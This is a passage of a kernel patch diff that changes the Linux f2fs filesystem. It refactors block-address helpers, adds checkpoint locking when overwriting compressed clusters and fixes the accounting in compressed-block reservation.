+-	int _submitted, compr_blocks, ret, i;
++	struct f2fs_sb_info *sbi = F2FS_M_SB(mapping);
++	int submitted, compr_blocks, i;
++	int ret = 0;
+ 
+ 	compr_blocks = f2fs_compressed_blocks(cc);
+ 
+@@ -1479,6 +1482,10 @@ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+ 	if (compr_blocks < 0)
+ 		return compr_blocks;
+ 
++	/* overwrite compressed cluster w/ normal cluster */
++	if (compr_blocks > 0)
++		f2fs_lock_op(sbi);
++
+ 	for (i = 0; i < cc->cluster_size; i++) {
+ 		if (!cc->rpages[i])
+ 			continue;
+@@ -1503,7 +1510,7 @@ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+ 		if (!clear_page_dirty_for_io(cc->rpages[i]))
+ 			goto continue_unlock;
+ 
+-		ret = f2fs_write_single_data_page(cc->rpages[i], &_submitted,
++		ret = f2fs_write_single_data_page(cc->rpages[i], &submitted,
+ 						NULL, NULL, wbc, io_type,
+ 						compr_blocks, false);
+ 		if (ret) {
+@@ -1511,26 +1518,29 @@ static int f2fs_write_raw_pages(struct compress_ctx *cc,
+ 				unlock_page(cc->rpages[i]);
+ 				ret = 0;
+ 			} else if (ret == -EAGAIN) {
++				ret = 0;
+ 				/*
+ 				 * for quota file, just redirty left pages to
+ 				 * avoid deadlock caused by cluster update race
+ 				 * from foreground operation.
+ 				 */
+ 				if (IS_NOQUOTA(cc->inode))
+-					return 0;
+-				ret = 0;
++					goto out;
+ 				f2fs_io_schedule_timeout(DEFAULT_IO_TIMEOUT);
+ 				goto retry_write;
+ 			}
+-			return ret;
++			goto out;
+ 		}
+ 
+-		*submitted += _submitted;
++		*submitted_p += submitted;
+ 	}
+ 
+-	f2fs_balance_fs(F2FS_M_SB(mapping), true);
++out:
++	if (compr_blocks > 0)
++		f2fs_unlock_op(sbi);
+ 
+-	return 0;
++	f2fs_balance_fs(sbi, true);
++	return ret;
+ }
+ 
+ int f2fs_write_multi_pages(struct compress_ctx *cc,
+@@ -1833,16 +1843,18 @@ void f2fs_put_page_dic(struct page *page, bool in_task)
+  * check whether cluster blocks are contiguous, and add extent cache entry
+  * only if cluster blocks are logically and physically contiguous.
+  */
+-unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn)
++unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn,
++						unsigned int ofs_in_node)
+ {
+-	bool compressed = f2fs_data_blkaddr(dn) == COMPRESS_ADDR;
++	bool compressed = data_blkaddr(dn->inode, dn->node_page,
++					ofs_in_node) == COMPRESS_ADDR;
+ 	int i = compressed ? 1 : 0;
+ 	block_t first_blkaddr = data_blkaddr(dn->inode, dn->node_page,
+-						dn->ofs_in_node + i);
++							ofs_in_node + i);
+ 
+ 	for (i += 1; i < F2FS_I(dn->inode)->i_cluster_size; i++) {
+ 		block_t blkaddr = data_blkaddr(dn->inode, dn->node_page,
+-						dn->ofs_in_node + i);
++							ofs_in_node + i);
+ 
+ 		if (!__is_valid_data_blkaddr(blkaddr))
+ 			break;
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 8b561af379743..b83b8ac29f430 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -50,7 +50,7 @@ void f2fs_destroy_bioset(void)
+ 	bioset_exit(&f2fs_bioset);
+ }
+ 
+-static bool __is_cp_guaranteed(struct page *page)
++bool f2fs_is_cp_guaranteed(struct page *page)
+ {
+ 	struct address_space *mapping = page->mapping;
+ 	struct inode *inode;
+@@ -67,8 +67,6 @@ static bool __is_cp_guaranteed(struct page *page)
+ 			S_ISDIR(inode->i_mode))
+ 		return true;
+ 
+-	if (f2fs_is_compressed_page(page))
+-		return false;
+ 	if ((S_ISREG(inode->i_mode) && IS_NOQUOTA(inode)) ||
+ 			page_private_gcing(page))
+ 		return true;
+@@ -327,7 +325,7 @@ static void f2fs_write_end_io(struct bio *bio)
+ 
+ 	bio_for_each_segment_all(bvec, bio, iter_all) {
+ 		struct page *page = bvec->bv_page;
+-		enum count_type type = WB_DATA_TYPE(page);
++		enum count_type type = WB_DATA_TYPE(page, false);
+ 
+ 		if (page_private_dummy(page)) {
+ 			clear_page_private_dummy(page);
+@@ -733,7 +731,7 @@ int f2fs_submit_page_bio(struct f2fs_io_info *fio)
+ 		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+ 	inc_page_count(fio->sbi, is_read_io(fio->op) ?
+-			__read_io_type(page) : WB_DATA_TYPE(fio->page));
++			__read_io_type(page) : WB_DATA_TYPE(fio->page, false));
+ 
+ 	__submit_bio(fio->sbi, bio, fio->type);
+ 	return 0;
+@@ -941,7 +939,7 @@ int f2fs_merge_page_bio(struct f2fs_io_info *fio)
+ 	if (fio->io_wbc)
+ 		wbc_account_cgroup_owner(fio->io_wbc, fio->page, PAGE_SIZE);
+ 
+-	inc_page_count(fio->sbi, WB_DATA_TYPE(page));
++	inc_page_count(fio->sbi, WB_DATA_TYPE(page, false));
+ 
+ 	*fio->last_block = fio->new_blkaddr;
+ 	*fio->bio = bio;
+@@ -955,6 +953,7 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio)
+ 	enum page_type btype = PAGE_TYPE_OF_BIO(fio->type);
+ 	struct f2fs_bio_info *io = sbi->write_io[btype] + fio->temp;
+ 	struct page *bio_page;
++	enum count_type type;
+ 
+ 	f2fs_bug_on(sbi, is_read_io(fio->op));
+ 
+@@ -982,9 +981,10 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio)
+ 		bio_page = fio->page;
+ 
+ 	/* set submitted = true as a return value */
+-	fio->submitted = true;
++	fio->submitted = 1;
+ 
+-	inc_page_count(sbi, WB_DATA_TYPE(bio_page));
++	type = WB_DATA_TYPE(bio_page, fio->compressed_page);
++	inc_page_count(sbi, type);
+ 
+ 	if (io->bio &&
+ 	    (!io_is_mergeable(sbi, io->bio, io, fio, io->last_block_in_bio,
+@@ -997,8 +997,9 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio)
+ 		if (F2FS_IO_ALIGNED(sbi) &&
+ 				(fio->type == DATA || fio->type == NODE) &&
+ 				fio->new_blkaddr & F2FS_IO_SIZE_MASK(sbi)) {
+-			dec_page_count(sbi, WB_DATA_TYPE(bio_page));
+-			fio->retry = true;
++			dec_page_count(sbi, WB_DATA_TYPE(bio_page,
++						fio->compressed_page));
++			fio->retry = 1;
+ 			goto skip;
+ 		}
+ 		io->bio = __bio_alloc(fio, BIO_MAX_VECS);
+@@ -1102,18 +1103,12 @@ static int f2fs_submit_page_read(struct inode *inode, struct page *page,
+ 	return 0;
+ }
+ 
+-static void __set_data_blkaddr(struct dnode_of_data *dn)
++static void __set_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+-	struct f2fs_node *rn = F2FS_NODE(dn->node_page);
+-	__le32 *addr_array;
+-	int base = 0;
+-
+-	if (IS_INODE(dn->node_page) && f2fs_has_extra_attr(dn->inode))
+-		base = get_extra_isize(dn->inode);
++	__le32 *addr = get_dnode_addr(dn->inode, dn->node_page);
+ 
+-	/* Get physical address of data block */
+-	addr_array = blkaddr_in_node(rn);
+-	addr_array[base + dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
++	dn->data_blkaddr = blkaddr;
++	addr[dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
+ }
+ 
+ /*
+@@ -1122,18 +1117,17 @@ static void __set_data_blkaddr(struct dnode_of_data *dn)
+  *  ->node_page
+  *    update block addresses in the node page
+  */
+-void f2fs_set_data_blkaddr(struct dnode_of_data *dn)
++void f2fs_set_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+ 	f2fs_wait_on_page_writeback(dn->node_page, NODE, true, true);
+-	__set_data_blkaddr(dn);
++	__set_data_blkaddr(dn, blkaddr);
+ 	if (set_page_dirty(dn->node_page))
+ 		dn->node_changed = true;
+ }
+ 
+ void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
+ {
+-	dn->data_blkaddr = blkaddr;
+-	f2fs_set_data_blkaddr(dn);
++	f2fs_set_data_blkaddr(dn, blkaddr);
+ 	f2fs_update_read_extent_cache(dn);
+ }
+ 
+@@ -1148,7 +1142,8 @@ int f2fs_reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
+ 
+ 	if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
+ 		return -EPERM;
+-	if (unlikely((err = inc_valid_block_count(sbi, dn->inode, &count))))
++	err = inc_valid_block_count(sbi, dn->inode, &count, true);
++	if (unlikely(err))
+ 		return err;
+ 
+ 	trace_f2fs_reserve_new_blocks(dn->inode, dn->nid,
+@@ -1160,8 +1155,7 @@ int f2fs_reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
+ 		block_t blkaddr = f2fs_data_blkaddr(dn);
+ 
+ 		if (blkaddr == NULL_ADDR) {
+-			dn->data_blkaddr = NEW_ADDR;
+-			__set_data_blkaddr(dn);
++			__set_data_blkaddr(dn, NEW_ADDR);
+ 			count--;
+ 		}
+ 	}
+@@ -1419,13 +1413,12 @@ static int __allocate_data_block(struct dnode_of_data *dn, int seg_type)
+ 		return err;
+ 
+ 	dn->data_blkaddr = f2fs_data_blkaddr(dn);
+-	if (dn->data_blkaddr != NULL_ADDR)
+-		goto alloc;
+-
+-	if (unlikely((err = inc_valid_block_count(sbi, dn->inode, &count))))
+-		return err;
++	if (dn->data_blkaddr == NULL_ADDR) {
++		err = inc_valid_block_count(sbi, dn->inode, &count, true);
++		if (unlikely(err))
++			return err;
++	}
+ 
+-alloc:
+ 	set_summary(&sum, dn->nid, dn->ofs_in_node, ni.version);
+ 	old_blkaddr = dn->data_blkaddr;
+ 	f2fs_allocate_data_block(sbi, NULL, old_blkaddr, &dn->data_blkaddr,
+@@ -2739,8 +2732,6 @@ int f2fs_do_write_data_page(struct f2fs_io_info *fio)
+ 	f2fs_outplace_write_data(&dn, fio);
+ 	trace_f2fs_do_write_data_page(page, OPU);
+ 	set_inode_flag(inode, FI_APPEND_WRITE);
+-	if (page->index == 0)
+-		set_inode_flag(inode, FI_FIRST_BLOCK_WRITTEN);
+ out_writepage:
+ 	f2fs_put_dnode(&dn);
+ out:
+@@ -2776,10 +2767,10 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 		.old_blkaddr = NULL_ADDR,
+ 		.page = page,
+ 		.encrypted_page = NULL,
+-		.submitted = false,
++		.submitted = 0,
+ 		.compr_blocks = compr_blocks,
+-		.need_lock = LOCK_RETRY,
+-		.post_read = f2fs_post_read_required(inode),
++		.need_lock = compr_blocks ? LOCK_DONE : LOCK_RETRY,
++		.post_read = f2fs_post_read_required(inode) ? 1 : 0,
+ 		.io_type = io_type,
+ 		.io_wbc = wbc,
+ 		.bio = bio,
+@@ -2819,9 +2810,6 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 
+ 	zero_user_segment(page, offset, PAGE_SIZE);
+ write:
+-	if (f2fs_is_drop_cache(inode))
+-		goto out;
+-
+ 	/* Dentry/quota blocks are controlled by checkpoint */
+ 	if (S_ISDIR(inode->i_mode) || quota_inode) {
+ 		/*
+@@ -2858,6 +2846,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 	if (err == -EAGAIN) {
+ 		err = f2fs_do_write_data_page(&fio);
+ 		if (err == -EAGAIN) {
++			f2fs_bug_on(sbi, compr_blocks);
+ 			fio.need_lock = LOCK_REQ;
+ 			err = f2fs_do_write_data_page(&fio);
+ 		}
+@@ -2902,7 +2891,7 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 	}
+ 
+ 	if (submitted)
+-		*submitted = fio.submitted ? 1 : 0;
++		*submitted = fio.submitted;
+ 
+ 	return 0;
+ 
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index e5a9498b89c06..5ae1c4aa3ae92 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -74,6 +74,11 @@ struct f2fs_fault_info {
+ 
+ extern const char *f2fs_fault_name[FAULT_MAX];
+ #define IS_FAULT_SET(fi, type) ((fi)->inject_type & BIT(type))
++
++/* maximum retry count for injected failure */
++#define DEFAULT_FAILURE_RETRY_COUNT		8
++#else
++#define DEFAULT_FAILURE_RETRY_COUNT		1
+ #endif
+ 
+ /*
+@@ -764,8 +769,6 @@ enum {
+ 	FI_UPDATE_WRITE,	/* inode has in-place-update data */
+ 	FI_NEED_IPU,		/* used for ipu per file */
+ 	FI_ATOMIC_FILE,		/* indicate atomic file */
+-	FI_FIRST_BLOCK_WRITTEN,	/* indicate #0 data block was written */
+-	FI_DROP_CACHE,		/* drop dirty page cache */
+ 	FI_DATA_EXIST,		/* indicate data exists */
+ 	FI_INLINE_DOTS,		/* indicate inline dot dentries */
+ 	FI_SKIP_WRITES,		/* should skip data page writeback */
+@@ -1067,7 +1070,8 @@ struct f2fs_sm_info {
+  * f2fs monitors the number of several block types such as on-writeback,
+  * dirty dentry blocks, dirty node blocks, and dirty meta blocks.
+  */
+-#define WB_DATA_TYPE(p)	(__is_cp_guaranteed(p) ? F2FS_WB_CP_DATA : F2FS_WB_DATA)
++#define WB_DATA_TYPE(p, f)			\
++	(f || f2fs_is_cp_guaranteed(p) ? F2FS_WB_CP_DATA : F2FS_WB_DATA)
+ enum count_type {
+ 	F2FS_DIRTY_DENTS,
+ 	F2FS_DIRTY_DATA,
+@@ -1183,19 +1187,19 @@ struct f2fs_io_info {
+ 	struct page *encrypted_page;	/* encrypted page */
+ 	struct page *compressed_page;	/* compressed page */
+ 	struct list_head list;		/* serialize IOs */
+-	bool submitted;		/* indicate IO submission */
+-	int need_lock;		/* indicate we need to lock cp_rwsem */
+-	bool in_list;		/* indicate fio is in io_list */
+-	bool is_por;		/* indicate IO is from recovery or not */
+-	bool retry;		/* need to reallocate block address */
+-	int compr_blocks;	/* # of compressed block addresses */
+-	bool encrypted;		/* indicate file is encrypted */
+-	bool post_read;		/* require post read */
++	unsigned int compr_blocks;	/* # of compressed block addresses */
++	unsigned int need_lock:8;	/* indicate we need to lock cp_rwsem */
++	unsigned int version:8;		/* version of the node */
++	unsigned int submitted:1;	/* indicate IO submission */
++	unsigned int in_list:1;		/* indicate fio is in io_list */
++	unsigned int is_por:1;		/* indicate IO is from recovery or not */
++	unsigned int retry:1;		/* need to reallocate block address */
++	unsigned int encrypted:1;	/* indicate file is encrypted */
++	unsigned int post_read:1;	/* require post read */
+ 	enum iostat_type io_type;	/* io type */
+ 	struct writeback_control *io_wbc; /* writeback control */
+ 	struct bio **bio;		/* bio for ipu */
+ 	sector_t *last_block;		/* last block number in bio */
+-	unsigned char version;		/* version of the node */
+ };
+ 
+ struct bio_entry {
+@@ -2287,7 +2291,7 @@ static inline bool __allow_reserved_blocks(struct f2fs_sb_info *sbi,
+ 
+ static inline void f2fs_i_blocks_write(struct inode *, block_t, bool, bool);
+ static inline int inc_valid_block_count(struct f2fs_sb_info *sbi,
+-				 struct inode *inode, blkcnt_t *count)
++				 struct inode *inode, blkcnt_t *count, bool partial)
+ {
+ 	blkcnt_t diff = 0, release = 0;
+ 	block_t avail_user_block_count;
+@@ -2328,6 +2332,11 @@ static inline int inc_valid_block_count(struct f2fs_sb_info *sbi,
+ 			avail_user_block_count = 0;
+ 	}
+ 	if (unlikely(sbi->total_valid_block_count > avail_user_block_count)) {
++		if (!partial) {
++			spin_unlock(&sbi->stat_lock);
++			goto enospc;
++		}
++
+ 		diff = sbi->total_valid_block_count - avail_user_block_count;
+ 		if (diff > *count)
+ 			diff = *count;
+@@ -3247,22 +3256,13 @@ static inline bool f2fs_is_cow_file(struct inode *inode)
+ 	return is_inode_flag_set(inode, FI_COW_FILE);
+ }
+ 
+-static inline bool f2fs_is_first_block_written(struct inode *inode)
+-{
+-	return is_inode_flag_set(inode, FI_FIRST_BLOCK_WRITTEN);
+-}
+-
+-static inline bool f2fs_is_drop_cache(struct inode *inode)
+-{
+-	return is_inode_flag_set(inode, FI_DROP_CACHE);
+-}
+-
++static inline __le32 *get_dnode_addr(struct inode *inode,
++					struct page *node_page);
+ static inline void *inline_data_addr(struct inode *inode, struct page *page)
+ {
+-	struct f2fs_inode *ri = F2FS_INODE(page);
+-	int extra_size = get_extra_isize(inode);
++	__le32 *addr = get_dnode_addr(inode, page);
+ 
+-	return (void *)&(ri->i_addr[extra_size + DEF_INLINE_RESERVED_SIZE]);
++	return (void *)(addr + DEF_INLINE_RESERVED_SIZE);
+ }
+ 
+ static inline int f2fs_has_inline_dentry(struct inode *inode)
+@@ -3397,6 +3397,17 @@ static inline int get_inline_xattr_addrs(struct inode *inode)
+ 	return F2FS_I(inode)->i_inline_xattr_size;
+ }
+ 
++static inline __le32 *get_dnode_addr(struct inode *inode,
++					struct page *node_page)
++{
++	int base = 0;
++
++	if (IS_INODE(node_page) && f2fs_has_extra_attr(inode))
++		base = get_extra_isize(inode);
++
++	return blkaddr_in_node(F2FS_NODE(node_page)) + base;
++}
++
+ #define f2fs_get_inode_mode(i) \
+ 	((is_inode_flag_set(i, FI_ACL_MODE)) ? \
+ 	 (F2FS_I(i)->i_acl_mode) : ((i)->i_mode))
+@@ -3761,6 +3772,7 @@ void f2fs_init_ckpt_req_control(struct f2fs_sb_info *sbi);
+  */
+ int __init f2fs_init_bioset(void);
+ void f2fs_destroy_bioset(void);
++bool f2fs_is_cp_guaranteed(struct page *page);
+ int f2fs_init_bio_entry_cache(void);
+ void f2fs_destroy_bio_entry_cache(void);
+ void f2fs_submit_bio(struct f2fs_sb_info *sbi,
+@@ -3779,7 +3791,7 @@ void f2fs_submit_page_write(struct f2fs_io_info *fio);
+ struct block_device *f2fs_target_device(struct f2fs_sb_info *sbi,
+ 		block_t blk_addr, sector_t *sector);
+ int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr);
+-void f2fs_set_data_blkaddr(struct dnode_of_data *dn);
++void f2fs_set_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr);
+ void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr);
+ int f2fs_reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count);
+ int f2fs_reserve_new_block(struct dnode_of_data *dn);
+@@ -4246,7 +4258,8 @@ struct decompress_io_ctx *f2fs_alloc_dic(struct compress_ctx *cc);
+ void f2fs_decompress_end_io(struct decompress_io_ctx *dic, bool failed,
+ 				bool in_task);
+ void f2fs_put_page_dic(struct page *page, bool in_task);
+-unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn);
++unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn,
++						unsigned int ofs_in_node);
+ int f2fs_init_compress_ctx(struct compress_ctx *cc);
+ void f2fs_destroy_compress_ctx(struct compress_ctx *cc, bool reuse);
+ void f2fs_init_compress_info(struct f2fs_sb_info *sbi);
+@@ -4303,7 +4316,8 @@ static inline void f2fs_put_page_dic(struct page *page, bool in_task)
+ {
+ 	WARN_ON_ONCE(1);
+ }
+-static inline unsigned int f2fs_cluster_blocks_are_contiguous(struct dnode_of_data *dn) { return 0; }
++static inline unsigned int f2fs_cluster_blocks_are_contiguous(
++			struct dnode_of_data *dn, unsigned int ofs_in_node) { return 0; }
+ static inline bool f2fs_sanity_check_cluster(struct dnode_of_data *dn) { return false; }
+ static inline int f2fs_init_compress_inode(struct f2fs_sb_info *sbi) { return 0; }
+ static inline void f2fs_destroy_compress_inode(struct f2fs_sb_info *sbi) { }
+@@ -4360,15 +4374,24 @@ static inline bool f2fs_disable_compressed_file(struct inode *inode)
+ {
+ 	struct f2fs_inode_info *fi = F2FS_I(inode);
+ 
+-	if (!f2fs_compressed_file(inode))
++	f2fs_down_write(&F2FS_I(inode)->i_sem);
++
++	if (!f2fs_compressed_file(inode)) {
++		f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 		return true;
+-	if (S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))
++	}
++	if (f2fs_is_mmap_file(inode) ||
++		(S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))) {
++		f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 		return false;
++	}
+ 
+ 	fi->i_flags &= ~F2FS_COMPR_FL;
+ 	stat_dec_compr_inode(inode);
+ 	clear_inode_flag(inode, FI_COMPRESSED_FILE);
+ 	f2fs_mark_inode_dirty_sync(inode, true);
++
++	f2fs_up_write(&F2FS_I(inode)->i_sem);
+ 	return true;
+ }
+ 
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 46e4960a9dcf7..2fbc8d89c600b 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -560,20 +560,14 @@ static int f2fs_file_open(struct inode *inode, struct file *filp)
+ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+-	struct f2fs_node *raw_node;
+ 	int nr_free = 0, ofs = dn->ofs_in_node, len = count;
+ 	__le32 *addr;
+-	int base = 0;
+ 	bool compressed_cluster = false;
+ 	int cluster_index = 0, valid_blocks = 0;
+ 	int cluster_size = F2FS_I(dn->inode)->i_cluster_size;
+ 	bool released = !atomic_read(&F2FS_I(dn->inode)->i_compr_blocks);
+ 
+-	if (IS_INODE(dn->node_page) && f2fs_has_extra_attr(dn->inode))
+-		base = get_extra_isize(dn->inode);
+-
+-	raw_node = F2FS_NODE(dn->node_page);
+-	addr = blkaddr_in_node(raw_node) + base + ofs;
++	addr = get_dnode_addr(dn->inode, dn->node_page) + ofs;
+ 
+ 	/* Assumption: truncateion starts with cluster */
+ 	for (; count > 0; count--, addr++, dn->ofs_in_node++, cluster_index++) {
+@@ -591,8 +585,7 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 		if (blkaddr == NULL_ADDR)
+ 			continue;
+ 
+-		dn->data_blkaddr = NULL_ADDR;
+-		f2fs_set_data_blkaddr(dn);
++		f2fs_set_data_blkaddr(dn, NULL_ADDR);
+ 
+ 		if (__is_valid_data_blkaddr(blkaddr)) {
+ 			if (!f2fs_is_valid_blkaddr(sbi, blkaddr,
+@@ -602,9 +595,6 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 				valid_blocks++;
+ 		}
+ 
+-		if (dn->ofs_in_node == 0 && IS_INODE(dn->node_page))
+-			clear_inode_flag(dn->inode, FI_FIRST_BLOCK_WRITTEN);
+-
+ 		f2fs_invalidate_blocks(sbi, blkaddr);
+ 
+ 		if (!released || blkaddr != COMPRESS_ADDR)
+@@ -1497,8 +1487,7 @@ static int f2fs_do_zero_range(struct dnode_of_data *dn, pgoff_t start,
+ 		}
+ 
+ 		f2fs_invalidate_blocks(sbi, dn->data_blkaddr);
+-		dn->data_blkaddr = NEW_ADDR;
+-		f2fs_set_data_blkaddr(dn);
++		f2fs_set_data_blkaddr(dn, NEW_ADDR);
+ 	}
+ 
+ 	f2fs_update_read_extent_cache_range(dn, start, 0, index - start);
+@@ -3449,8 +3438,7 @@ static int release_compress_blocks(struct dnode_of_data *dn, pgoff_t count)
+ 			if (blkaddr != NEW_ADDR)
+ 				continue;
+ 
+-			dn->data_blkaddr = NULL_ADDR;
+-			f2fs_set_data_blkaddr(dn);
++			f2fs_set_data_blkaddr(dn, NULL_ADDR);
+ 		}
+ 
+ 		f2fs_i_compr_blocks_update(dn->inode, compr_blocks, false);
+@@ -3474,7 +3462,7 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	int ret;
+ 	int writecount;
+ 
+-	if (!f2fs_sb_has_compression(F2FS_I_SB(inode)))
++	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+ 	if (!f2fs_compressed_file(inode))
+@@ -3487,7 +3475,7 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (ret)
+ 		return ret;
+ 
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	inode_lock(inode);
+ 
+@@ -3573,10 +3561,10 @@ static int f2fs_release_compress_blocks(struct file *filp, unsigned long arg)
+ 	return ret;
+ }
+ 
+-static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count)
++static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count,
++		unsigned int *reserved_blocks)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+-	unsigned int reserved_blocks = 0;
+ 	int cluster_size = F2FS_I(dn->inode)->i_cluster_size;
+ 	block_t blkaddr;
+ 	int i;
+@@ -3599,41 +3587,53 @@ static int reserve_compress_blocks(struct dnode_of_data *dn, pgoff_t count)
+ 		blkcnt_t reserved;
+ 		int ret;
+ 
+-		for (i = 0; i < cluster_size; i++, dn->ofs_in_node++) {
+-			blkaddr = f2fs_data_blkaddr(dn);
++		for (i = 0; i < cluster_size; i++) {
++			blkaddr = data_blkaddr(dn->inode, dn->node_page,
++						dn->ofs_in_node + i);
+ 
+ 			if (i == 0) {
+-				if (blkaddr == COMPRESS_ADDR)
+-					continue;
+-				dn->ofs_in_node += cluster_size;
+-				goto next;
++				if (blkaddr != COMPRESS_ADDR) {
++					dn->ofs_in_node += cluster_size;
++					goto next;
++				}
++				continue;
+ 			}
+ 
+-			if (__is_valid_data_blkaddr(blkaddr)) {
++			/*
++			 * compressed cluster was not released due to it
++			 * fails in release_compress_blocks(), so NEW_ADDR
++			 * is a possible case.
++			 */
++			if (blkaddr == NEW_ADDR ||
++				__is_valid_data_blkaddr(blkaddr)) {
+ 				compr_blocks++;
+ 				continue;
+ 			}
+-
+-			dn->data_blkaddr = NEW_ADDR;
+-			f2fs_set_data_blkaddr(dn);
+ 		}
+ 
+ 		reserved = cluster_size - compr_blocks;
+-		ret = inc_valid_block_count(sbi, dn->inode, &reserved);
+-		if (ret)
++
++		/* for the case all blocks in cluster were reserved */
++		if (reserved == 1)
++			goto next;
++
++		ret = inc_valid_block_count(sbi, dn->inode, &reserved, false);
++		if (unlikely(ret))
+ 			return ret;
+ 
+-		if (reserved != cluster_size - compr_blocks)
+-			return -ENOSPC;
++		for (i = 0; i < cluster_size; i++, dn->ofs_in_node++) {
++			if (f2fs_data_blkaddr(dn) == NULL_ADDR)
++				f2fs_set_data_blkaddr(dn, NEW_ADDR);
++		}
+ 
+ 		f2fs_i_compr_blocks_update(dn->inode, compr_blocks, true);
+ 
+-		reserved_blocks += reserved;
++		*reserved_blocks += reserved;
+ next:
+ 		count -= cluster_size;
+ 	}
+ 
+-	return reserved_blocks;
++	return 0;
+ }
+ 
+ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+@@ -3644,7 +3644,7 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 	unsigned int reserved_blocks = 0;
+ 	int ret;
+ 
+-	if (!f2fs_sb_has_compression(F2FS_I_SB(inode)))
++	if (!f2fs_sb_has_compression(sbi))
+ 		return -EOPNOTSUPP;
+ 
+ 	if (!f2fs_compressed_file(inode))
+@@ -3657,10 +3657,7 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (atomic_read(&F2FS_I(inode)->i_compr_blocks))
+-		goto out;
+-
+-	f2fs_balance_fs(F2FS_I_SB(inode), true);
++	f2fs_balance_fs(sbi, true);
+ 
+ 	inode_lock(inode);
+ 
+@@ -3669,6 +3666,9 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 		goto unlock_inode;
+ 	}
+ 
++	if (atomic_read(&F2FS_I(inode)->i_compr_blocks))
++		goto unlock_inode;
++
+ 	f2fs_down_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 
+@@ -3694,7 +3694,7 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 		count = min(end_offset - dn.ofs_in_node, last_idx - page_idx);
+ 		count = round_up(count, F2FS_I(inode)->i_cluster_size);
+ 
+-		ret = reserve_compress_blocks(&dn, count);
++		ret = reserve_compress_blocks(&dn, count, &reserved_blocks);
+ 
+ 		f2fs_put_dnode(&dn);
+ 
+@@ -3702,23 +3702,21 @@ static int f2fs_reserve_compress_blocks(struct file *filp, unsigned long arg)
+ 			break;
+ 
+ 		page_idx += count;
+-		reserved_blocks += ret;
+ 	}
+ 
+ 	filemap_invalidate_unlock(inode->i_mapping);
+ 	f2fs_up_write(&F2FS_I(inode)->i_gc_rwsem[WRITE]);
+ 
+-	if (ret >= 0) {
++	if (!ret) {
+ 		clear_inode_flag(inode, FI_COMPRESS_RELEASED);
+ 		inode->i_ctime = current_time(inode);
+ 		f2fs_mark_inode_dirty_sync(inode, true);
+ 	}
+ unlock_inode:
+ 	inode_unlock(inode);
+-out:
+ 	mnt_drop_write_file(filp);
+ 
+-	if (ret >= 0) {
++	if (!ret) {
+ 		ret = put_user(reserved_blocks, (u64 __user *)arg);
+ 	} else if (reserved_blocks &&
+ 			atomic_read(&F2FS_I(inode)->i_compr_blocks)) {
+@@ -3967,16 +3965,20 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 				sizeof(option)))
+ 		return -EFAULT;
+ 
+-	if (!f2fs_compressed_file(inode) ||
+-			option.log_cluster_size < MIN_COMPRESS_LOG_SIZE ||
+-			option.log_cluster_size > MAX_COMPRESS_LOG_SIZE ||
+-			option.algorithm >= COMPRESS_MAX)
++	if (option.log_cluster_size < MIN_COMPRESS_LOG_SIZE ||
